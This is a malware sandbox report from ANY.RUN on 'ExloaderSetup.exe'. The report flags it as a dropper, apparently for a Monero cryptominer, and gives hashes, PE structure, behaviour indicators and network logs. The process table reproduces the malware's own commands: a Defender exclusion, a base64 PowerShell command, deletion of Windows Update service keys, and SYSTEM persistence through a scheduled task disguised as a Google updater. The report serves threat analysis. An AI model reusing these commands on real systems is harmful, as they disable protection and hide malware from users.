analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

ExloaderSetup.exe

Full analysis: https://app.any.run/tasks/c523a187-bd85-45d5-b4b3-1a6872a41466
Verdict: Malicious activity
Analysis date: April 01, 2023, 01:20:14
OS: Windows 7 Professional Service Pack 1 (build: 7601, 64 bit)
Indicators:
MIME: application/x-dosexec
File info: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
MD5:

60F4D01E21F14E48AF9F2024D5A7AD59

SHA1:

FD60ACE5FEEA5D813DEEBC007C0E1933931982C5

SHA256:

161C8B407D317897A6F55A2812EECBB1FE4E999156AE666933C9999F602AB81C

SSDEEP:

393216:VYvVgx3oBkGQsA33cmlCcUEGxkeq/OzxMpBt7sZxYL3of4m46:VwVgp6kGQfHcmlh6Keq/gMtQZxMo

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • Exloader.exe (PID: 2604)
      • updater.exe (PID: 2572)
      • ExLoader_Installer.exe (PID: 2848)
      • ExLoader_Installer.exe (PID: 2100)
    • Uses Task Scheduler to autorun other applications

      • powershell.exe (PID: 2596)
      • powershell.exe (PID: 2536)
    • Uses Task Scheduler to run other applications

      • powershell.exe (PID: 3036)
    • Runs injected code in another process

      • powershell.EXE (PID: 2164)
    • Creates a writable file the system directory

      • powershell.exe (PID: 2416)
      • powershell.EXE (PID: 2200)
    • Application was injected by another process

      • dllhost.exe (PID: 2692)
  • SUSPICIOUS

    • Starts POWERSHELL.EXE for commands execution

      • ExloaderSetup.exe (PID: 624)
      • Exloader.exe (PID: 2604)
      • updater.exe (PID: 2572)
    • BASE64 encoded PowerShell command has been detected

      • ExloaderSetup.exe (PID: 624)
    • Base64-obfuscated command line is found

      • ExloaderSetup.exe (PID: 624)
    • Reads the Internet Settings

      • ExloaderSetup.exe (PID: 624)
      • powershell.exe (PID: 2636)
      • ExLoader_Installer.exe (PID: 2100)
    • Executable content was dropped or overwritten

      • ExloaderSetup.exe (PID: 624)
      • ExLoader_Installer.exe (PID: 2100)
      • Exloader.exe (PID: 2604)
      • updater.exe (PID: 2572)
    • Reads security settings of Internet Explorer

      • powershell.exe (PID: 2264)
    • Uses powercfg.exe to modify the power settings

      • cmd.exe (PID: 2548)
      • cmd.exe (PID: 2368)
    • Starts SC.EXE for service management

      • cmd.exe (PID: 2532)
      • cmd.exe (PID: 2564)
    • Uses REG/REGEDIT.EXE to modify register

      • cmd.exe (PID: 2532)
      • cmd.exe (PID: 2564)
    • The process checks if current user has admin rights

      • Exloader.exe (PID: 2604)
      • updater.exe (PID: 2572)
    • Starts CMD.EXE for commands execution

      • Exloader.exe (PID: 2604)
      • ExLoader_Installer.exe (PID: 2848)
    • The process executes via Task Scheduler

      • updater.exe (PID: 2572)
      • powershell.EXE (PID: 2164)
      • powershell.EXE (PID: 2200)
    • Reads settings of System Certificates

      • powershell.exe (PID: 2264)
      • ExLoader_Installer.exe (PID: 2848)
      • dialer.exe (PID: 2796)
    • Uses WMIC.EXE to obtain a list of video controllers

      • cmd.exe (PID: 2472)
    • Drops a system driver (possible attempt to evade defenses)

      • updater.exe (PID: 2572)
    • Unusual connection from system programs

      • powershell.exe (PID: 2416)
    • Connects to unusual port

      • dialer.exe (PID: 2796)
  • INFO

    • Reads the computer name

      • ExloaderSetup.exe (PID: 624)
      • ExLoader_Installer.exe (PID: 2100)
      • ExLoader_Installer.exe (PID: 2848)
    • Checks supported languages

      • ExloaderSetup.exe (PID: 624)
      • Exloader.exe (PID: 2604)
      • ExLoader_Installer.exe (PID: 2100)
      • updater.exe (PID: 2572)
      • ExLoader_Installer.exe (PID: 2848)
    • The process checks LSA protection

      • ExloaderSetup.exe (PID: 624)
      • powershell.exe (PID: 2264)
      • powershell.exe (PID: 2636)
      • powershell.exe (PID: 2596)
      • dialer.exe (PID: 3044)
      • powershell.exe (PID: 3036)
      • ExLoader_Installer.exe (PID: 2100)
      • ExLoader_Installer.exe (PID: 2848)
      • powershell.EXE (PID: 2164)
      • powershell.exe (PID: 2416)
      • powershell.exe (PID: 2536)
      • dllhost.exe (PID: 2692)
      • powershell.EXE (PID: 2200)
      • WMIC.exe (PID: 2452)
      • dialer.exe (PID: 2796)
    • Manual execution by a user

      • powershell.exe (PID: 2636)
      • powershell.exe (PID: 2596)
      • cmd.exe (PID: 2548)
      • cmd.exe (PID: 2532)
      • dialer.exe (PID: 3044)
      • powershell.exe (PID: 2416)
      • cmd.exe (PID: 2564)
      • cmd.exe (PID: 2368)
      • cmd.exe (PID: 2852)
      • cmd.exe (PID: 2472)
      • dialer.exe (PID: 1508)
      • dialer.exe (PID: 2796)
    • Create files in a temporary directory

      • ExloaderSetup.exe (PID: 624)
      • powershell.exe (PID: 2636)
      • powershell.exe (PID: 2596)
      • powershell.exe (PID: 2264)
      • Exloader.exe (PID: 2604)
      • powershell.exe (PID: 3036)
      • ExLoader_Installer.exe (PID: 2100)
    • Reads settings of System Certificates

      • powershell.exe (PID: 2636)
      • powershell.exe (PID: 2416)
    • Reads security settings of Internet Explorer

      • powershell.exe (PID: 2636)
      • powershell.exe (PID: 2596)
      • powershell.exe (PID: 3036)
    • Creates files in the program directory

      • Exloader.exe (PID: 2604)
      • cmd.exe (PID: 2472)
      • updater.exe (PID: 2572)
    • Process checks computer location settings

      • ExLoader_Installer.exe (PID: 2848)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win32 Executable (generic) (42.6)
.exe | Win16/32 Executable Delphi generic (19.5)
.exe | Generic Win/DOS Executable (18.9)
.exe | DOS Executable Generic (18.9)

EXIF

EXE

Subsystem: Windows GUI
SubsystemVersion: 4
ImageVersion: -
OSVersion: 4
EntryPoint: 0x14d1
UninitializedDataSize: -
InitializedDataSize: 19866624
CodeSize: 2048
LinkerVersion: 6
PEType: PE32
ImageFileCharacteristics: No relocs, Executable, No line numbers, No symbols, 32-bit, No debug
TimeStamp: 0000:00:00 00:00:00
MachineType: Intel 386 or later, and compatibles

Summary

Architecture: IMAGE_FILE_MACHINE_I386
Subsystem: IMAGE_SUBSYSTEM_WINDOWS_GUI
Compilation Date: 01-Jan-1970 00:00:00
Detected languages:
  • English - United States

DOS Header

Magic number: MZ
Bytes on last page of file: 0x0090
Pages in file: 0x0003
Relocations: 0x0000
Size of header: 0x0004
Min extra paragraphs: 0x0000
Max extra paragraphs: 0xFFFF
Initial SS value: 0x0000
Initial SP value: 0x00B8
Checksum: 0x0000
Initial IP value: 0x0000
Initial CS value: 0x0000
Overlay number: 0x0000
OEM identifier: 0x0000
OEM information: 0x0000
Address of NE header: 0x00000080

PE Headers

Signature: PE
Machine: IMAGE_FILE_MACHINE_I386
Number of sections: 4
Time date stamp: 01-Jan-1970 00:00:00
Pointer to Symbol Table: 0x00000000
Number of symbols: 0
Size of Optional Header: 0x00E0
Characteristics:
  • IMAGE_FILE_32BIT_MACHINE
  • IMAGE_FILE_DEBUG_STRIPPED
  • IMAGE_FILE_EXECUTABLE_IMAGE
  • IMAGE_FILE_LINE_NUMS_STRIPPED
  • IMAGE_FILE_LOCAL_SYMS_STRIPPED
  • IMAGE_FILE_RELOCS_STRIPPED

Sections

Name
Virtual Address
Virtual Size
Raw Size
Charateristics
Entropy
.text
0x00001000
0x00000668
0x00000800
IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
4.63988
.rdata
0x00002000
0x012DE3A3
0x012DE400
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
7.99907
.bss
0x012E1000
0x00000004
0x00000000
IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
0
.rsrc
0x012E2000
0x00013E40
0x00014000
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
6.08668

Resources

Title
Entropy
Size
Codepage
Language
Type
1
4.88522
675
UNKNOWN
English - United States
RT_MANIFEST
2
2.20934
296
UNKNOWN
English - United States
RT_ICON
3
4.09612
3752
UNKNOWN
English - United States
RT_ICON
4
4.63458
2216
UNKNOWN
English - United States
RT_ICON
5
4.69609
1384
UNKNOWN
English - United States
RT_ICON
6
7.94794
28488
UNKNOWN
English - United States
RT_ICON
7
3.88767
16936
UNKNOWN
English - United States
RT_ICON
8
3.94179
9640
UNKNOWN
English - United States
RT_ICON
9
3.98176
6760
UNKNOWN
English - United States
RT_ICON
10
3.97877
4264
UNKNOWN
English - United States
RT_ICON

Imports

kernel32.dll
msvcrt.dll
shell32.dll
No data.
screenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
119
Monitored processes
64
Malicious processes
10
Suspicious processes
3

Behavior graph

Click at the process to see the details
drop and start drop and start start drop and start inject exloadersetup.exe no specs exloadersetup.exe powershell.exe no specs exloader.exe powershell.exe exloader_installer.exe cmd.exe cmd.exe powershell.exe sc.exe no specs powercfg.exe no specs sc.exe no specs powercfg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs powercfg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs powercfg.exe no specs reg.exe no specs reg.exe no specs schtasks.exe no specs dialer.exe powershell.exe no specs cmd.exe no specs choice.exe no specs schtasks.exe no specs powershell.exe no specs powershell.exe no specs updater.exe powershell.exe exloader_installer.exe cmd.exe no specs reg.exe no specs cmd.exe no specs reg.exe no specs cmd.exe no specs reg.exe no specs cmd.exe cmd.exe powershell.exe powercfg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs powercfg.exe no specs sc.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs powercfg.exe no specs reg.exe no specs dllhost.exe reg.exe no specs powercfg.exe no specs schtasks.exe no specs dialer.exe cmd.exe cmd.exe wmic.exe no specs dialer.exe

Process information

PID
CMD
Path
Indicators
Parent process
2000"C:\Users\admin\AppData\Local\Temp\ExloaderSetup.exe" C:\Users\admin\AppData\Local\Temp\ExloaderSetup.exeexplorer.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
3221226540
Modules
Images
c:\users\admin\appdata\local\temp\exloadersetup.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
624"C:\Users\admin\AppData\Local\Temp\ExloaderSetup.exe" C:\Users\admin\AppData\Local\Temp\ExloaderSetup.exe
explorer.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
Modules
Images
c:\users\admin\appdata\local\temp\exloadersetup.exe
c:\windows\syswow64\ntdll.dll
c:\windows\system32\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
2264"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAYwBrACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQAeAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGMAeAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGkAZAB3ACMAPgA="C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeExloaderSetup.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\ntdll.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll
2604"C:\Users\admin\AppData\Local\Temp\Exloader.exe" C:\Users\admin\AppData\Local\Temp\Exloader.exe
ExloaderSetup.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
Modules
Images
c:\users\admin\appdata\local\temp\exloader.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
2636C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -ForceC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\atl.dll
2100"C:\Users\admin\AppData\Local\Temp\ExLoader_Installer.exe" C:\Users\admin\AppData\Local\Temp\ExLoader_Installer.exe
ExloaderSetup.exe
User:
admin
Integrity Level:
HIGH
Modules
Images
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\users\admin\appdata\local\temp\exloader_installer.exe
c:\windows\system32\kernelbase.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757\comctl32.dll
c:\windows\system32\user32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\gdi32.dll
2532C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /fC:\Windows\System32\cmd.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\usp10.dll
c:\windows\system32\lpk.dll
2548C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0C:\Windows\System32\cmd.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ntdll.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
2596C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wqzjlkpym#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
2080sc stop UsoSvc C:\Windows\System32\sc.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
A tool to aid in developing services for WindowsNT
Exit code:
1060
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\sc.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
Total events
20 582
Read events
20 412
Write events
156
Delete events
14

Modification events

(PID) Process:(624) ExloaderSetup.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(624) ExloaderSetup.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(624) ExloaderSetup.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(624) ExloaderSetup.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
(PID) Process:(2636) powershell.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(2636) powershell.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(2636) powershell.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(2636) powershell.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
(PID) Process:(2636) powershell.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\14C\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(2284) reg.exeKey:HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters
Operation:delete keyName:(default)
Value:
Executable files
26
Suspicious files
44
Text files
430
Unknown types
26

Dropped files

PID
Process
Filename
Type
2100ExLoader_Installer.exeC:\Users\admin\AppData\Local\Temp\RarSFX0\data\app.so
MD5:
SHA256:
624ExloaderSetup.exeC:\Users\admin\AppData\Local\Temp\Exloader.exeexecutable
MD5:BDD0E41494E3ABEE1A2DD016452D61E8
SHA256:D32C2F0FA93D76B269233EF6B081C135CB37B8C003C1589558CE206B9FC3E28C
2636powershell.exeC:\Users\admin\AppData\Local\Temp\pi0fug0c.beg.psm1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
2596powershell.exeC:\Users\admin\AppData\Local\Temp\unlqrlve.kqy.ps1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
2636powershell.exeC:\Users\admin\AppData\Local\Temp\cn4y33jb.r0w.ps1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
2100ExLoader_Installer.exeC:\Users\admin\AppData\Local\Temp\RarSFX0\vcruntime140.dllexecutable
MD5:11D9AC94E8CB17BD23DEA89F8E757F18
SHA256:E1D6F78A72836EA120BD27A33AE89CBDC3F3CA7D9D0231AAA3AAC91996D2FA4E
2596powershell.exeC:\Users\admin\AppData\Local\Temp\lflpyyii.zpd.psm1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
2636powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivedbf
MD5:446DD1CF97EABA21CF14D03AEBC79F27
SHA256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
2100ExLoader_Installer.exeC:\Users\admin\AppData\Local\Temp\RarSFX0\msvcp140.dllexecutable
MD5:BF78C15068D6671693DFCDFA5770D705
SHA256:A88B8C1C8F27BF90FE960E0E8BD56984AD48167071AF92D96EC1051F89F827FB
624ExloaderSetup.exeC:\Users\admin\AppData\Local\Temp\ExLoader_Installer.exeexecutable
MD5:1B5F3670E124134F90FC6E7857DBA132
SHA256:8116A5D5BB05E55F1B209D5C85A2A75A4F9DDC05E162F5EB44F45C709CE9E206
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
9
DNS requests
7
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2416
powershell.exe
GET
304
178.79.242.11:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?aa2654b7fc615776
DE
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2416
powershell.exe
178.79.242.11:80
ctldl.windowsupdate.com
LLNW
DE
suspicious
2848
ExLoader_Installer.exe
204.79.197.200:443
www.bing.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
2848
ExLoader_Installer.exe
142.250.184.196:443
www.google.com
GOOGLE
US
whitelisted
2796
dialer.exe
162.19.139.184:12222
xmr.2miners.com
OVH SAS
FR
suspicious
2848
ExLoader_Installer.exe
212.82.100.137:443
search.yahoo.com
Yahoo! UK Services Limited
IE
shared
2848
ExLoader_Installer.exe
213.180.193.146:443
meteum.ai
YANDEX LLC
RU
whitelisted
2848
ExLoader_Installer.exe
13.107.21.200:443
www.bing.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
2796
dialer.exe
104.20.68.143:443
pastebin.com
CLOUDFLARENET
malicious

DNS requests

Domain
IP
Reputation
ctldl.windowsupdate.com
  • 178.79.242.11
whitelisted
search.yahoo.com
  • 212.82.100.137
whitelisted
www.google.com
  • 142.250.184.196
whitelisted
meteum.ai
  • 213.180.193.146
unknown
www.bing.com
  • 204.79.197.200
  • 13.107.21.200
whitelisted
xmr.2miners.com
  • 162.19.139.184
suspicious
pastebin.com
  • 104.20.68.143
  • 104.20.67.143
  • 172.67.34.170
shared

Threats

PID
Process
Class
Message
Crypto Currency Mining Activity Detected
ET INFO Observed DNS Query to Cryptocurrency Mining Pool Domain (xmr .2miners .com)
No debug info